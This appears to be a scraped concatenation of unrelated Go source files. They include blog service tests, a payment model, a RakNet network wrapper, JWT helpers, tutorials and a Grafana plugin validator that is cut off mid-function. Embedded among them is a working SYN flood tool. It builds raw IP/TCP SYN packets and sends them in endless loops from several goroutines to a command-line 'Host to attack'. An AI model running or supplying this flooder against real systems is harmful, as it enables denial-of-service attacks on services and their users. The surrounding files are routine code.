var DbQueryError = errors.New("DB_Query_Error")
var SignupError = errors.New("Signup_Error")
var UserVerificationError = errors.New("User_Verification_Error")
var JSONParseError = errors.New("JSON_Parse_Error")
var AddProductError = errors.New("Add_Product_Error")
|
package blog
import (
"fmt"
"testing"
"time"
// goblin
. "github.com/franela/goblin"
"github.com/jinzhu/gorm"
_ "github.com/jinzhu/gorm/dialects/sqlite"
)
func Test_Articles(t *testing.T) {
g := Goblin(t)
g.Describe("Service: Blog", func() {
var blog *BlogService
var db *gorm.DB
g.Before(func() {
db, _ = gorm.Open("sqlite3", ":memory:")
blog = NewService(db)
g.Assert(blog.Init()).Eql(nil)
})
g.Describe("Article()", func() {
g.It("should create an article", func() {
var expTitle = "EXAMPLE TITLE"
var expContent = "example content"
var expStatus = Published
var expPermission = Private
newPost, err := blog.CreatePost(expTitle, expContent, expStatus, expPermission)
g.Assert(err == nil).Equal(true)
var expArticle Article
err2 := db.Find(&expArticle, "id = ?", 1).Error
g.Assert(err2).Equal(nil)
// check actual data in db
g.Assert(expTitle).Equal(expArticle.Title)
g.Assert(expContent).Equal(expArticle.Content)
g.Assert(expPermission).Equal(expArticle.Permission)
g.Assert(expStatus).Equal(expArticle.Status)
// find event log
var expLog ArticleEventLog
err3 := db.Find(&expLog, "id = ?", newPost.ID).Error
g.Assert(err3).Equal(nil)
g.Assert(expLog.ArticleID).Equal(uint32(1))
g.Assert(expLog.ArticleEvent).Equal(PublishPost)
g.Assert(expLog.NewStatus).Equal(Published)
g.Assert(expLog.NewPermission).Equal(Private)
})
g.It("should create article failed /validation error", func() {
// set validation to a known value
var oldValidation = blog.Validations
blog.SetValidations(BlogValidations{
MaxTitleChars: 5,
MaxArticleChars: 10,
})
// vialation 1# size too long
_, err1 := blog.CreatePost("LONG_TITLE", "233", Published, Private)
g.Assert(err1 != nil).Equal(true)
// 1.1
_, err11 := blog.CreatePost("", "233", Published, Private)
g.Assert(err11 != nil).Equal(true)
// 2
_, err2 := blog.CreatePost("f", "HAS_A_ANOTHER_LONG_TIME", Published, Private)
g.Assert(err2 != nil).Equal(true)
// 3
_, err3 := blog.CreatePost("f", "g", Removed, Private)
g.Assert(err3 != nil).Equal(true)
blog.SetValidations(oldValidation)
})
g.It("should delete post", func() {
// create another new post
newPost, errC := blog.CreatePost("T", "G", Published, Private)
g.Assert(errC == nil).Equal(true)
// get ID
errD := blog.DeletePost(newPost.ID)
g.Assert(errD == nil).Equal(true)
// find post
var delPost Article
errF := db.Find(&delPost, "id = ?", newPost.ID).Error
g.Assert(errF == nil).Equal(true)
// Notice: It's not actually deleted from DB
// Just make the status as "Removed"
g.Assert(delPost.Status).Equal(Removed)
// TODO: add event
})
g.It("should publish a drafted post", func() {
newPost, errC := blog.CreatePost("T", "R", Drafted, Private)
g.Assert(errC == nil).Equal(true)
// getID
_, errD := blog.PublishPost(newPost.ID)
g.Assert(errD == nil).Equal(true)
// find post
var pubPost Article
errF := db.Find(&pubPost, "id = ?", newPost.ID).Error
g.Assert(errF == nil).Eql(true)
g.Assert(pubPost.Status).Eql(Published)
})
g.It("should throw error on publish a non-draft post", func() {
newPost, errC := blog.CreatePost("T", "R", Published, Private)
// throw error because it has already published
g.Assert(errC == nil).Equal(true)
// publish post
_, errD := blog.PublishPost(newPost.ID)
g.Assert(errD == nil).Eql(false)
})
g.It("should find all posts with newly created", func() {
errDA := db.Delete(Article{}).Error
g.Assert(errDA == nil).Eql(true)
for i := range []int{1, 2, 3} {
blog.CreatePost(string(i), "B", Published, Private)
}
_, articles, errL := blog.ListAllPostsByPage(nil, nil)
g.Assert(errL == nil).Eql(true)
g.Assert(len(articles)).Equal(3)
})
g.It("should get one post", func() {
newPost, errC := blog.CreatePost("R", "S", Published, Public)
g.Assert(errC == nil).Eql(true)
post, errG := blog.GetOnePost(newPost.ID)
g.Assert(errG == nil).Eql(true)
g.Assert(post.ID).Eql(newPost.ID)
g.Assert(post.Status).Equal(newPost.Status)
g.Assert(post.CreatedAt.UnixNano()).Equal(newPost.CreatedAt.UnixNano())
})
})
g.Describe("Get Articles by Filter", func() {
g.Before(func() {
// clear all data
db.Exec("delete from articles")
// insert fixtures
p := Public
s := Published
for i := 0; i < 12; i++ {
// so there will be 6 private posts
if i%2 == 0 {
p = Private
}
switch i % 3 {
case 0:
s = Published
case 1:
s = Drafted
case 2:
default:
s = Removed
}
db.Create(&Article{
Title: fmt.Sprintf("Title-%d", i),
Content: "content",
Permission: p,
Status: s,
})
time.Sleep(10 * time.Millisecond)
}
})
g.After(func() {
db.Exec("delete from articles")
})
g.It("should load all posts", func() {
db := blog.DB
posts, err := listPostsWithFilters(db, nil, nil, nil)
g.Assert(err == nil).Equal(true)
g.Assert(len(posts)).Equal(12)
})
g.It("should work /status = PUBLISHED", func() {
db := blog.DB
p := Published
filter := ArticleFilter{
Status: &p,
Permission: nil,
}
posts, err := listPostsWithFilters(db, &filter, nil, nil)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Eql(4)
})
g.It("should work /limit = 2", func() {
filter := ArticlePageLimit{
Offset: 0,
Limit: 2,
}
posts, err := listPostsWithFilters(db, nil, &filter, nil)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Eql(2)
})
g.It("should work /offset = 7", func() {
filter := ArticlePageLimit{
Offset: 7,
Limit: 10,
}
posts, err := listPostsWithFilters(db, nil, &filter, nil)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Eql(5)
})
g.It("should work /createdAt desc", func() {
s := "desc"
filter := ArticleOrder{
UpdatedAt: nil,
CreatedAt: &s,
}
posts, err := listPostsWithFilters(db, nil, nil, &filter)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Equal(12)
lastPost := posts[0]
for i := 1; i < len(posts); i++ {
before := posts[i].CreatedAt.Before(lastPost.CreatedAt)
lastPost = posts[i]
g.Assert(before).Equal(true)
}
})
g.It("should work /createdAt asc", func() {
s := "asc"
filter := ArticleOrder{
UpdatedAt: nil,
CreatedAt: &s,
}
posts, err := listPostsWithFilters(db, nil, nil, &filter)
g.Assert(err == nil).Eql(true)
g.Assert(len(posts)).Equal(12)
lastPost := posts[0]
for i := 1; i < len(posts); i++ {
after := posts[i].CreatedAt.After(lastPost.CreatedAt)
lastPost = posts[i]
g.Assert(after).Equal(true)
}
})
// TODO: more testcases
})
})
}
|
package main
import (
"bytes"
"encoding/binary"
"flag"
"fmt"
"log"
"math/rand"
"net"
"strconv"
"syscall"
)
func argParser() (string, int) {
host := flag.String("host", "", "Host to attack.")
port := flag.Int("port", 0, "lol")
flag.Parse()
return *host, *port
}
func main() {
// Creating argv parsing
HOST, PORT := argParser()
log.Printf("Host and Port: {%s:%d}\n", HOST, PORT)
// Getting IPv4 address of the host
// If it's invalid value:
// printing about it in stderror
AIP := net.ParseIP(HOST).To4()
if AIP == nil {
log.Fatal("Invalid Hostname: " + HOST)
} else {
handle(AIP, PORT)
}
}
func handle(ip net.IP, port int) {
sock, err := syscall.Socket(syscall.AF_INET, syscall.SOCK_RAW, syscall.IPPROTO_TCP)
if err != nil {
log.Fatal(err.Error())
}
// Allow to custom IP packets
err = syscall.SetsockoptInt(sock, syscall.IPPROTO_IP, syscall.IP_HDRINCL, 1)
if err != nil {
log.Fatal(err.Error())
}
totalSend := 0
for i := 0; i < 3; i++ {
go func() {
for {
srcIp := net.IP(make([]byte, 4))
ipByte := ipHeader{}
data, err := ipByte.makeHeader(srcIp, ip)
if err != nil {
log.Fatal("Error in unpacking ip byte:\t" + err.Error())
}
tcpByte := tcpHeader{}
tcpData, err := tcpByte.makeHeader(srcIp, ip, port)
if err != nil {
log.Fatal("Error in unpacking tcp byte:\t" + err.Error())
}
var buff []byte
buff = append(buff, data...)
buff = append(buff, tcpData...)
sockAddr := syscall.SockaddrInet4{}
sockAddr.Port = port
copy(sockAddr.Addr[:4], ip)
totalSend++
fmt.Print("Total pockets send: " + (strconv.Itoa(totalSend)) + "\r")
err = syscall.Sendto(sock, buff, 0, &sockAddr)
if err != nil {
fmt.Println("Sendto error:\t" + err.Error())
}
}
}()
}
c := make(chan int, 1)
<-c
}
func (h *ipHeader) makeHeader(srcIp net.IP, dstIp net.IP) ([]byte, error) {
h.PID = 1
h.TTL = 255
h.Proto = syscall.IPPROTO_TCP
h.HCheckSum = 0
h.SRCip = srcIp
h.DSTip = dstIp
return h.Marshal()
}
func (header *tcpHeader) makeHeader(srcIp, destIp net.IP, destPort int) ([]byte, error) {
header.DestPort = destPort
header.Flag = 0x02
header.AckNum = 0
header.Window = 2048
header.SourcePort = rand.Intn(65000)
header.SeqNum = rand.Intn(1<<32 - 1)
var pseudoH *pseudoHeader = &pseudoHeader{}
copy(pseudoH.SourceIp[:4], srcIp)
copy(pseudoH.DestIp[:4], destIp)
pseudoH.ProtoType = syscall.IPPROTO_TCP
pseudoH.SegLen = uint16(20)
pseudoH.Fixed = 0
var buffer = bytes.Buffer{}
if err := binary.Write(&buffer, binary.BigEndian, pseudoH); err != nil {
log.Fatal("Pseudo Header error")
}
tcpBytes, _ := header.Encoding()
buffer.Write(tcpBytes)
header.CheckSum = int(CheckSum(buffer.Bytes()))
return header.Encoding()
}
func CheckSum(data []byte) uint16 {
var (
sum uint32
length int = len(data)
index int
)
for length > 1 {
sum += uint32(data[index])<<8 + uint32(data[index+1])
index += 2
length -= 2
}
if length > 0 {
sum += uint32(data[index])
}
sum += sum >> 16
return uint16(^sum)
}
|
package payment
import (
"time"
"github.com/jinzhu/gorm"
"github.com/satori/go.uuid"
"github.com/tppgit/we_service/entity/order"
)
var STATUS_PAYMENT_SUCCESS string = "SUCCESS"
var STATUS_PAYMENT_FAIL string = "FAIL"
type Payment struct {
ID uuid.UUID `gorm:"type:char(36);primary_key;column:id;not null"`
OrderID uuid.UUID `gorm:"type:varchar(36);column:fk_order;not null"`
Order order.Order `gorm:"foreignkey:OrderId"`
Token string `gorm:"type:varchar(100);column:token"`
ChargeID string `gorm:"type:varchar(100);column:chargeid"`
Email string `gorm:"type:varchar(100);column:email"`
Status string `gorm:"type:varchar(100);column:status"`
Code string `gorm:"type:varchar(100);column:code"`
Message string `gorm:"type:text;column:message"`
RawRespone string `gorm:"type:text;column:raw_respone"`
RawRequest string `gorm:"type:text;column:raw_request"`
Amount float32 `gorm:"type:int;column:amount"`
CreatedAt time.Time
}
func (d *Payment) BeforeCreate(scope *gorm.Scope) error {
return scope.SetColumn("ID", uuid.NewV4())
}
|
package crypto
import (
"crypto/rsa"
"crypto/x509"
"fmt"
"strings"
)
type VerifyByFingerprint struct {
Fingerprint string
FingerprintChallengeLevel uint
FingerprintLength uint
}
// VerifyPeerCertificate validates that one of the given certificates contains a public key matching the configured
// fingerprint.
func (v *VerifyByFingerprint) VerifyPeerCertificate(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
errMessages := make([]string, len(rawCerts))
for _, rawCert := range rawCerts {
err := v.verifyRawCert(rawCert)
if err == nil {
fmt.Println("verify end")
return nil
}
errMessages = append(errMessages, err.Error())
}
return fmt.Errorf("given certificates not valid: %s", strings.Join(errMessages, ","))
}
func (v *VerifyByFingerprint) verifyRawCert(rawCert []byte) error {
if cert, err := x509.ParseCertificate(rawCert); err != nil {
return err
} else if rsaPublicKey, ok := cert.PublicKey.(*rsa.PublicKey); !ok {
return fmt.Errorf("given certificate must be RSA")
} else {
// @todo #31: check validity, SAN/CommonName, extensions
return v.verifyPublicKey(rsaPublicKey)
}
}
func (v *VerifyByFingerprint) verifyPublicKey(publicKey *rsa.PublicKey) error {
fingerprint, err := FingerprintPublicKey(publicKey, v.FingerprintChallengeLevel, v.FingerprintLength)
if err != nil {
return fmt.Errorf("fingerprint cannot be generated: %s", err)
}
if fingerprint != v.Fingerprint {
return fmt.Errorf("actual fingerprint %s differs from configured one", fingerprint)
}
return nil
}
|
package main
import "fmt"
func main() {
// map declaration
marks := map[string]int64{
"maths": 95,
"phy": 96,
"chem": 87,
}
fmt.Println("marks before update :")
fmt.Println(marks)
fmt.Println("marks after update (new value added) :")
marks["computer sci"]=92
fmt.Println(marks)
fmt.Println("marks after update (new value deleted)")
delete(marks,"computer sci")
fmt.Println(marks)
} |
package raknet
import (
"bytes"
"encoding/hex"
"errors"
"io"
"net"
"time"
"unsafe"
"go.uber.org/zap"
"github.com/rssllyn/go-raknet/wrapper"
)
const (
ConnPacketBuffer = 100 // number of packets to keep and wait for handling
acceptBacklog = 128 // number of connections to keep and wait for accept
shutDownNotifyDuration = 100 // milliseconds
)
var Logger *zap.Logger
func init() {
Logger, _ = zap.NewDevelopment()
}
type Conn struct {
peer wrapper.RakPeerInterface
buff []byte // first packet data, buff it for reading multiple times
buffReadIdx int // start index in buff that has not been read
chData chan []byte //
remoteAddressOrGUID wrapper.AddressOrGUID // used to specify remote peer when Send
localAddress net.Addr
remoteAddress net.Addr
// indicates whether the connection is opened as a client peer
// the RakPeerInterface will only be ShutDown for client connection, which is expected to connect to only one server
isClient bool
done chan struct{}
}
// receiving packet for client peer
func (c *Conn) monitor() {
for true {
packet := c.peer.Receive()
if unsafe.Pointer(packet.(wrapper.SwigcptrPacket).Swigcptr()) == nil {
// no packets received
time.Sleep(10 * time.Millisecond)
continue
}
c.handlePacket(packet)
}
}
// hanldling packet for client peer
func (c *Conn) handlePacket(packet wrapper.Packet) {
defer c.peer.DeallocatePacket(packet)
identifier := wrapper.GetPacketIdentifier(packet)
Logger.Info("packet received", zap.Int("message identifier", int(identifier)))
switch wrapper.DefaultMessageIDTypes(identifier) {
case wrapper.ID_USER_PACKET_ENUM:
data := []byte(wrapper.GetPacketPayload(packet))
c.chData <- data
Logger.Debug("packet data", zap.String("hex", hex.EncodeToString(data)))
case wrapper.ID_DISCONNECTION_NOTIFICATION:
Logger.Debug("connection lost")
close(c.done)
case wrapper.ID_CONNECTION_LOST:
Logger.Debug("connection lost")
close(c.done)
}
}
func (c *Conn) Read(b []byte) (int, error) {
for len(c.buff) == 0 {
select {
case c.buff = <-c.chData:
c.buffReadIdx = 0
case <-c.done:
if len(c.chData) > 0 {
Logger.Debug("connection closed, but still have data unprocessed, will process first")
} else {
return 0, io.EOF
}
}
}
n := copy(b, c.buff[c.buffReadIdx:])
if n == len(c.buff)-c.buffReadIdx {
c.buff = []byte{}
} else {
c.buffReadIdx += n
}
return n, nil
}
func (c *Conn) Write(b []byte) (int, error) {
if len(b) == 0 {
return 0, nil
}
var buff bytes.Buffer
buff.WriteByte(byte(wrapper.ID_USER_PACKET_ENUM))
buff.Write(b)
// wrapper requires the data sent (char* type in c++) to be ended with \0 character
buff.WriteByte(0)
sent := c.peer.Send(string(buff.Bytes()), buff.Len(), wrapper.HIGH_PRIORITY, wrapper.RELIABLE_ORDERED, byte(0), c.remoteAddressOrGUID, false)
if int(sent.Swigcptr()) < buff.Len() {
return int(sent.Swigcptr()), errors.New("not all data sent")
}
return len(b), nil
}
func (c *Conn) Close() error {
if c.isClient {
c.peer.Shutdown(uint(shutDownNotifyDuration))
return nil
} else {
return nil
}
}
func (c *Conn) LocalAddr() net.Addr {
return c.localAddress
}
func (c *Conn) RemoteAddr() net.Addr {
return c.remoteAddress
}
func (c *Conn) SetDeadline(t time.Time) error {
return nil
}
func (c *Conn) SetReadDeadline(t time.Time) error {
return nil
}
func (c *Conn) SetWriteDeadline(t time.Time) error {
return nil
}
// waitForConnectionAccepted blocks until a ID_CONNECTION_REQUEST_ACCEPTED packet is received from wrapper, and returns true
// it returns false with an error if it determines that the connection could never be accepted
func waitForConnectionAccepted(peer wrapper.RakPeerInterface) (wrapper.AddressOrGUID, error) {
for true {
packet := peer.Receive()
if unsafe.Pointer(packet.(wrapper.SwigcptrPacket).Swigcptr()) == nil {
// no packets received
time.Sleep(10 * time.Millisecond)
continue
}
identifier := wrapper.GetPacketIdentifier(packet)
switch wrapper.DefaultMessageIDTypes(identifier) {
case wrapper.ID_CONNECTION_REQUEST_ACCEPTED:
addressOrGUID := wrapper.NewAddressOrGUID(packet)
peer.DeallocatePacket(packet)
return addressOrGUID, nil
}
peer.DeallocatePacket(packet)
}
return nil, nil
}
func Dial(raddr string) (net.Conn, error) {
remoteUDPAddr, err := net.ResolveUDPAddr("udp", raddr)
if err != nil {
return nil, err
}
if remoteUDPAddr.IP == nil {
return nil, errors.New("no server ip address specified")
}
Logger.Debug("connecting to server", zap.String("server address", remoteUDPAddr.String()))
peer := wrapper.RakPeerInterfaceGetInstance()
socketDescriptor := wrapper.NewSocketDescriptor(uint16(0), "")
Logger.Debug(
"local address before connect",
zap.String("host", socketDescriptor.GetHostAddress()),
zap.Uint16("port", socketDescriptor.GetPort()),
)
var maxConnectionCount uint = 1
var socketDescriptorCount uint = 1
peer.Startup(maxConnectionCount, socketDescriptor, socketDescriptorCount)
var password string
var passwordLength int
peer.Connect(remoteUDPAddr.IP.String(), uint16(remoteUDPAddr.Port), password, passwordLength)
addressOrGUID, err := waitForConnectionAccepted(peer)
if err != nil {
return nil, err
}
Logger.Debug(
"local address after connected",
zap.String("host", socketDescriptor.GetHostAddress()),
zap.Uint16("port", socketDescriptor.GetPort()),
)
conn := &Conn{
chData: make(chan []byte, ConnPacketBuffer),
peer: peer,
remoteAddressOrGUID: addressOrGUID,
isClient: true,
done: make(chan struct{}),
remoteAddress: remoteUDPAddr,
}
go conn.monitor()
return conn, nil
}
type Listener struct {
peer wrapper.RakPeerInterface
sessions map[uint16]*Conn
chAccepts chan *Conn
listenAddress net.Addr
}
func (l *Listener) Accept() (net.Conn, error) {
select {
case conn := <-l.chAccepts:
return conn, nil
}
}
func (l *Listener) Close() error {
l.peer.Shutdown(uint(shutDownNotifyDuration))
return nil
}
func (l *Listener) Addr() net.Addr {
return l.listenAddress
}
// monitor receiving packets from the connection, and create sessions if neccessary
func (l *Listener) monitor() {
for true {
packet := l.peer.Receive()
if unsafe.Pointer(packet.(wrapper.SwigcptrPacket).Swigcptr()) == nil {
// no packets received
time.Sleep(10 * time.Millisecond)
continue
}
l.handlePacket(packet)
}
}
func (l *Listener) handlePacket(packet wrapper.Packet) {
defer l.peer.DeallocatePacket(packet)
identifier := wrapper.GetPacketIdentifier(packet)
Logger.Info("packet received", zap.Int("message identifier", int(identifier)))
switch wrapper.DefaultMessageIDTypes(identifier) {
case wrapper.ID_NEW_INCOMING_CONNECTION:
if len(l.chAccepts) >= cap(l.chAccepts) {
// prevent packet receiving of existing sessions being blocked
return
}
ra := packet.GetSystemAddress().ToString(true, []byte(":")[0]).(string)
Logger.Debug("remote address", zap.String("ip:port", ra))
remoteAddress, err := net.ResolveUDPAddr("udp", ra)
if err != nil {
Logger.Warn("failed to get remote address", zap.Error(err))
}
sess := &Conn{
chData: make(chan []byte, ConnPacketBuffer),
peer: l.peer,
remoteAddressOrGUID: wrapper.NewAddressOrGUID(packet),
isClient: false,
done: make(chan struct{}),
localAddress: l.listenAddress,
remoteAddress: remoteAddress,
}
// get unique ID for this session, notice that when wrapper detects connection lost,
// corresponding session ID would be reused in latter incomming connections
sessionID := packet.GetGuid().GetSystemIndex()
l.sessions[sessionID] = sess
l.chAccepts <- sess
Logger.Debug("new incoming connection received", zap.Uint16("session ID", sessionID))
case wrapper.ID_USER_PACKET_ENUM:
data := []byte(wrapper.GetPacketPayload(packet))
sessionID := packet.GetGuid().GetSystemIndex()
if sess, ok := l.sessions[sessionID]; ok {
sess.chData <- data
Logger.Debug("packet received for session", zap.Uint16("session ID", sessionID))
}
case wrapper.ID_DISCONNECTION_NOTIFICATION:
Logger.Debug("connection lost")
sessionID := packet.GetGuid().GetSystemIndex()
if sess, ok := l.sessions[sessionID]; ok {
close(sess.done)
}
case wrapper.ID_CONNECTION_LOST:
Logger.Debug("connection lost")
sessionID := packet.GetGuid().GetSystemIndex()
if sess, ok := l.sessions[sessionID]; ok {
close(sess.done)
}
}
}
func Listen(laddr string, maxConnections int) (net.Listener, error) {
udpAddr, err := net.ResolveUDPAddr("udp", laddr)
if err != nil {
return nil, err
}
var ip string
if udpAddr.IP != nil {
ip = udpAddr.IP.String()
}
peer := wrapper.RakPeerInterfaceGetInstance()
socketDescriptor := wrapper.NewSocketDescriptor(uint16(udpAddr.Port), ip)
var socketDescriptorCount uint = 1
peer.Startup(uint(maxConnections), socketDescriptor, socketDescriptorCount)
peer.SetMaximumIncomingConnections(uint16(maxConnections))
l := &Listener{
peer: peer,
sessions: make(map[uint16]*Conn),
chAccepts: make(chan *Conn, acceptBacklog),
listenAddress: udpAddr,
}
go l.monitor()
return l, nil
}
|
package loglib
import (
"context"
"github.com/sirupsen/logrus"
)
type contextKey string
var loggerContextKey = contextKey("logger")
// SetLogger sets the logger into the provided context and returns a copy
func SetLogger(ctx context.Context, value *logrus.Logger) context.Context {
return context.WithValue(ctx, loggerContextKey, value)
}
// GetLogger returns logger object from Context, else, return default concise logger
func GetLogger(ctx context.Context) *logrus.Logger {
if logger, ok := ctx.Value(loggerContextKey).(*logrus.Logger); ok {
return logger
}
return logrus.StandardLogger()
}
|
/*
145 is a curious number, as 1! + 4! + 5! = 1 + 24 + 120 = 145.
Find the sum of all numbers which are equal to the sum of the factorial of their digits.
Note: as 1! = 1 and 2! = 2 are not sums they are not included.
*/
package main
import (
"fmt"
)
var factorial = map[int]int{
0: 1,
1: 1,
2: 2,
3: 6,
4: 24,
5: 120,
6: 720,
7: 5040,
8: 40320,
9: 362880,
}
func main() {
sum := 0
for i := 10; i < 2500000; i++ {
n := i
digitSum := 0
for n > 0 {
digit := n % 10
digitSum += factorial[digit]
n /= 10
}
if digitSum == i {
fmt.Println(i)
sum += i
}
}
fmt.Println(sum)
}
|
package services
import (
"encoding/json"
"fmt"
"net/http"
"strings"
"github.com/albimcleod/go-modish/authentication"
jwt "github.com/dgrijalva/jwt-go"
"github.com/gorilla/mux"
)
// BaseService is an service to handle data requests
type BaseService struct {
Name string
}
// HandleError returns the error response
func (service *BaseService) HandleError(w http.ResponseWriter, err error, status int) bool {
if err != nil {
fmt.Printf("HandleError - %v\n", err)
service.WriteHeaderStatus(w, status)
if err := json.NewEncoder(w).Encode(err); err != nil {
fmt.Printf("HandleError.Encode - %v\n", err)
panic(err)
}
return true
}
return false
}
// WriteHeaderStatus writes the json content header
func (service *BaseService) WriteHeaderStatus(w http.ResponseWriter, status int) {
w.Header().Set("Content-Type", "application/json; charset=UTF-8")
w.WriteHeader(status)
}
// HandleNotFound returns the not found status code
func (service *BaseService) HandleNotFound(w http.ResponseWriter) {
service.WriteHeaderStatus(w, http.StatusNotFound)
}
// GetParam returns the value of a parameter
func (service *BaseService) GetParam(param string, r *http.Request) string {
vars := mux.Vars(r)
return vars[param]
}
// GetQuery returns the value of a query string
func (service *BaseService) GetQuery(param string, r *http.Request) string {
vals := r.URL.Query()
values, ok := vals[param] // Note type, not ID. ID wasn't specified anywhere.
if ok {
if len(values) > 0 {
return values[0]
}
}
return ""
}
// GetAuthorizationToken returns the authoriztion token
func (service *BaseService) GetAuthorizationToken(secret string, r *http.Request) (*jwt.Token, error) {
var token string
tokens, ok := r.Header["Authorization"]
if ok && len(tokens) >= 1 {
token = tokens[0]
token = strings.TrimPrefix(token, "Bearer ")
}
// If the token is empty...
if token == "" {
return nil, fmt.Errorf("No Token")
}
return authentication.ParseToken(token, secret)
}
|
package shared
import (
"github.com/cli/cli/v2/pkg/cmdutil"
"github.com/google/shlex"
"github.com/spf13/cobra"
)
// ExistingCommandFunc returns a function that will check if the given string
// corresponds to an existing command.
func ExistingCommandFunc(f *cmdutil.Factory, cmd *cobra.Command) func(string) bool {
return func(args string) bool {
split, err := shlex.Split(args)
if err != nil || len(split) == 0 {
return false
}
rootCmd := cmd.Root()
cmd, _, err = rootCmd.Traverse(split)
if err == nil && cmd != rootCmd {
return true
}
for _, ext := range f.ExtensionManager.List() {
if ext.Name() == split[0] {
return true
}
}
return false
}
}
|
package collection
import "github.com/scjalliance/drivestream/page"
// Reader provides readonly access to a collection.
type Reader struct {
ref Reference
nextState StateNum
nextPage page.SeqNum
}
// NewReader returns a collection reader for the given sequence number.
func NewReader(ref Reference) (*Reader, error) {
nextState, err := ref.States().Next()
if err != nil {
return nil, err
}
nextPage, err := ref.Pages().Next()
if err != nil {
return nil, err
}
return &Reader{
ref: ref,
nextState: nextState,
nextPage: nextPage,
}, nil
}
// Data returns information about the collection.
func (r *Reader) Data() (Data, error) {
return r.ref.Data()
}
// NextState returns the state number of the next state to be written.
func (r *Reader) NextState() StateNum {
return r.nextState
}
// LastState returns the last state of the collection.
func (r *Reader) LastState() (State, error) {
return r.State(r.nextState - 1)
}
// State returns the requested state from the collection.
func (r *Reader) State(stateNum StateNum) (State, error) {
return r.ref.State(stateNum).Data()
}
// States returns a slice of all states of the collection in ascending
// order.
func (r *Reader) States() ([]State, error) {
if r.nextState == 0 {
return nil, nil
}
states := make([]State, r.nextState)
n, err := r.ref.States().Read(0, states)
if err != nil {
return nil, err
}
if n != len(states) {
return nil, StatesTruncated{Drive: r.ref.Drive(), Collection: r.ref.SeqNum()}
}
return states, err
}
// NextPage returns the page number of the next page to be written
func (r *Reader) NextPage() page.SeqNum {
return r.nextPage
}
// LastPage returns the last page from the collection.
func (r *Reader) LastPage() (page.Data, error) {
return r.Page(r.nextPage - 1)
}
// Page returns the requested page from the collection.
func (r *Reader) Page(pageNum page.SeqNum) (page.Data, error) {
return r.ref.Page(pageNum).Data()
}
// Pages returns a slice of all pages within the collection in ascending
// order.
//
// Note that this may allocate a significant amount of memory for large
// collections.
//
// TODO: Consider making this a buffered call.
func (r *Reader) Pages() ([]page.Data, error) {
if r.nextPage == 0 {
return nil, nil
}
pages := make([]page.Data, r.nextPage)
n, err := r.ref.Pages().Read(0, pages)
if err != nil {
return nil, err
}
if n != len(pages) {
return nil, PagesTruncated{Drive: r.ref.Drive(), Collection: r.ref.SeqNum()}
}
return pages, err
}
|
// go_06
package main
import (
"fmt"
)
func main() {
/*数组
相同唯一类型的一组 已经编号 长度固定的数据项序列
类型可以是任意原始类型 索引从0号开始
var variable_name [size] variable_type*/
var first = [5]float32{1000.0, 1.1, 2.3, 6.5, 10.0}//{}中的个数不能大于[]中的数字,如果不填[]中的数,会根据{}中的个数自动设置SIZE
fmt.Println(first)
var second [10]int
for index := 0; index < 10; index++ {
second[index] = index + 1
fmt.Printf("second[%d] = %d\n", index, second[index])
}
/*var variable_name [SIZE1][SIZE2]...[SIZEN] variable_type*/
third := [3][4]int {
{0, 1, 2, 3},
{4, 5, 6, 7},
{8, 9, 10, 11}}
fmt.Println(third)
var four = [5]int{1, 2, 3, 4, 5}
setArray_len(four)
var five = []int{6, 7, 8, 9}
setArray(five)
}
func setArray(params []int) {
fmt.Println("len(Array) = ", len(params))
}
func setArray_len(params [5]int) {
fmt.Println("len(Array) = ", len(params))
} |
package plugin
import (
"bytes"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"net/http"
"os"
"path/filepath"
"regexp"
"strings"
"sync"
"github.com/grafana/plugin-validator/pkg/grafana"
"github.com/xeipuuv/gojsonschema"
)
type linkChecker struct{}
func (c linkChecker) check(ctx *checkContext) ([]ValidationComment, error) {
var errs []ValidationComment
mdLinks := regexp.MustCompile(`\[.+?\]\((.+?)\)`)
matches := mdLinks.FindAllSubmatch(ctx.Readme, -1)
var urls []string
for _, m := range matches {
path := string(m[1])
if strings.HasPrefix(path, "#") {
// Named anchors are allowed, but not checked.
continue
}
// Strip optional alt text for images, e.g. .
fields := strings.Fields(path)
if len(fields) > 0 {
path = fields[0]
}
if strings.HasPrefix(path, "https://") || strings.HasPrefix(path, "http://") {
urls = append(urls, path)
} else {
errs = append(errs, ValidationComment{
Severity: checkSeverityError,
Message: "README contains a relative link",
Details: fmt.Sprintf("Relative links are not supported by Grafana and results in broken links wherever we display the README. Please convert `%s` into an absolute link.", path),
})
}
}
type urlstatus struct {
url string
status string
}
brokenCh := make(chan urlstatus)
var wg sync.WaitGroup
wg.Add(len(urls))
for _, u := range urls {
go func(url string) {
defer wg.Done()
resp, err := http.Get(url)
if err != nil {
brokenCh <- urlstatus{url: url, status: err.Error()}
return
}
if resp.StatusCode != http.StatusOK {
brokenCh <- urlstatus{url: url, status: resp.Status}
}
}(u)
}
go func() {
wg.Wait()
close(brokenCh)
}()
for link := range brokenCh {
errs = append(errs, ValidationComment{
Severity: checkSeverityError,
Message: "README contains a broken link",
Details: fmt.Sprintf("Something went wrong when we tried looking up [%s](%s) (`%s`).", link.url, link.url, link.status),
})
}
return errs, nil
}
type screenshotChecker struct{}
func (c screenshotChecker) check(ctx *checkContext) ([]ValidationComment, error) {
var data struct {
Info struct {
Screenshots []struct {
Name string `json:"name"`
Path string `json:"path"`
} `json:"screenshots"`
} `json:"info"`
}
if err := json.Unmarshal(ctx.Metadata, &data); err != nil {
return nil, nil
}
if len(data.Info.Screenshots) == 0 {
return []ValidationComment{
{
Severity: checkSeverityWarning,
Message: "Plugin is missing screenshots",
Details: "Screenshots help users understand what your plugin does, and how to use it. Consider providing screenshots to your plugin by adding them under `info.screenshots` in the `plugin.json` file. For more information, refer to the [reference documentation](https://grafana.com/docs/grafana/latest/developers/plugins/metadata/#screenshots).",
},
}, nil
}
var errs []ValidationComment
for _, ss := range data.Info.Screenshots {
_, err := fallbackDir(ss.Path, ctx.DistDir, ctx.SrcDir)
if err != nil {
if err == errFileNotFound {
errs = append(errs, ValidationComment{
Severity: checkSeverityError,
Message: fmt.Sprintf("File not found: %s", ss.Path),
Details: "We couldn't find the specified file. Make sure that the file exists.",
})
continue
}
return nil, err
}
}
return errs, nil
}
type developerJargonChecker struct{}
// check checks whether the README contains developer jargon.
func (c developerJargonChecker) check(ctx *checkContext) ([]ValidationComment, error) {
jargon := []string{
"yarn",
"nodejs",
}
var found []string
for _, word := range jargon {
